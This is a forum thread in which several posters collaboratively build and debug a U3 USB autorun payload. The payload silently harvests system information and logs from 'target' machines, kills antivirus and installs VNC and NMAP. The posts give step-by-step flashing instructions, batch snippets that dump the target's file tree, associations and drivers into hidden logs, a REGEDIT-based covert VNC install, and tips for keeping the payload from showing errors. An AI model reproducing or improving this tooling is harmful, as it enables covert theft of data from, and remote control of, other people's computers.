Tmbomber

I'm available for testing as well :) (actually I never left, just been rather busy so I haven't been posting :) )

We have Thanksgiving now and Christmas break coming up. Give'em time.

Leapo said a couple weeks ago that he can't do anything with the payload during the week. He's only working on it as he has time on weekends.

Things to try: On your safetyed machine, run Menu.bat and disable everything. Turn on system information. On your target machine, turn off the antivirus. (the AVKill feature isn't working right now. We're working on it) On your target machine, verify that autorun is turned on. (I don't remember how to check that) *Then* stick your thumb drive in. Please report back what happened.

Ok, Yes, we *do* expect everybody to read all 29 pages of this thread. When I found this forum I read all the pinned threads. (they're pinned for a reason) I also read about half the other threads. There's all kinds of things to learn there. This goes against my better judgment, but... When you install the Universal Customizer, it puts a "Universal_Customizer" directory in C:\. Inside that directory you will find a few sub-directories. Before you do anything, create a text file in C:\ and name it "safety.txt" That'll keep you from hosing yourself. If you wanna do a payload from source files. Empty the "c:\Universal_Customizer\U3CUSTOM\" sub-directory. Leapo's payload has two parts, a "U3 ISO Source" directory and a "Flash Partition" directory. Everything in the U3 ISO Source directory get copied into "c:\Universal_Customizer\U3CUSTOM\". Then double click on "c:\Universal_Customizer\ISOCreate.cmd" That will run a batch file that will create the .ISO file and put it where it belongs. If you have a .iso file, rename it "U3CUSTOM.ISO" and move it into "c:\Universal_Customizer\bin". In either case, have your U3 thumb drive already plugged in and click on "Universal_Customizer.exe" (you'll find it in "c:\Universal_Customizer\") Follow instructions *exactly* Expecially the bit at the end where it has you extract the thumb drive and re-insert it. I don't think it matters if you close the window first, but I always extract, re-insert, then close the customizer. NOTE: Some payloads don't have anything to copy to the non-U3 partition of your thumb drive. Gonzor's and Leapo's do. For Leapo's, copy the contents of the "Flash Partition" sub-directory (that I mentioned above) to the second partition on the thumb drive. Open the non-U3 partition and run "Menu.bat" to configure the payload. For Gonzor's, copy "SBConfig-V2.0.18.exe" (or whatever the current version is) to the non-U3 partition and run it. Here's a tip if you're re-flashing a thumb drive. Delete the logs from the flash partition. One of the steps that the Universal Customizer does is to archive and restore the flash partition. Sometimes there are files in the logs that don't make it through that process. Better to get rid of them first.

I tried this and still got the "No Disk" error. When the error popped up I left it there and took a look to see how far along the log file was. It was hung up in "Network Services" I turned the "Network Services" dump off and it ran silently (with everything else except slurp2 and the installers turned on) I have no idea why It'd give the error there.

I think I found some source code for AVKill. http://www.datastronghold.com/archive/t13290.html

Anybody seen Leapo around anywhere??? He hasn't posted in over a week. HEY LEAPO!!!! I hope your on vacation and resting yer brain a lot... We're all missing ya here.

I had a problem of the batch file not finding the "FIND" command. I made mine look like: ver|%windir%\system32\find.exe "[Version 5.00." I need to check if win2k has a system32 directory. (It'd probably be easiest to just put a copy of the "FIND" command on the thumbdrive)

Woops... just deleted what was here. I confused myself... Put this: IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 mkdir %logdir%\Slurp_Data\ tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1 assoc > %logdir%\Slurp_Data\assoc.log 2>&1 driverquery > %logdir%\Slurp_Data\driver.log 2>&1 right at the beginning of the slurp1 code block. I think Leapo was going to put a switch in to turn that on and off.

*That*, is the infamous "No Disk" error that we've been talking about. It seems to stem from drive letters that show up in the list of drives that aren't actually drives. (such as on a laptop that has a CF slot when there's no CF card plugged into the slot) Leapo is presently working on a solution. Hey Leapo!!! How's that coming??? :)

SanDisk sells a 3 pack of 2 gig thumbdrives colored Red, White, & Blue. You can also get a single one that's Black. I keep the white one stock (white being pure). The blue one has everything turned on except the installers and Slurp2. The red one only has "System Information" and the VNC installer. I'm thinking of what to do with the black one. As soon as I go through the other installers I'll probably have the black one be VNC (and maybe NMAP) and the red one have all 4 installers.

Still looking into VNC. I just tried it on a win2k machine and it failed to install. The actual line that failed was: REGEDIT /s %installdir%\VNC\vnc.reg 2>&1 I'm not sure exactly what went wrong there. Also, Leapo, I had a thought... You were thinking of using the serial number of the USB drive to identify it. Would it be possible to run the test to see if the drive has *any* serial number, and then if it does, do the test we're doing now. That way it wouldn't do the IF Exists test unless there was actually a drive there to test. Just a thought...

Moderator assistance in thread one... (could some nice moderator split the backtrack stuff off to a new thread please???)

c.f. post 324 above. This is a known problem that exists if you have a USB card adapter. (one of those things that let you plug CF cards and SD cards and Smart Cards into your PC via a USB port) I have one on my home pc. Removing it makes the problem go away. I also have one built into my laptop at work... Can't remove that one. The problem stems from the drive detection portion of the payload. Leapo's previous post explains how he's trying to get around that. For the time being, just hit "Cancel" when that error pops up. (you may have to hit it several times.) Hey Leapo, I haven't checked, but could the problem also be in the go.vbs file???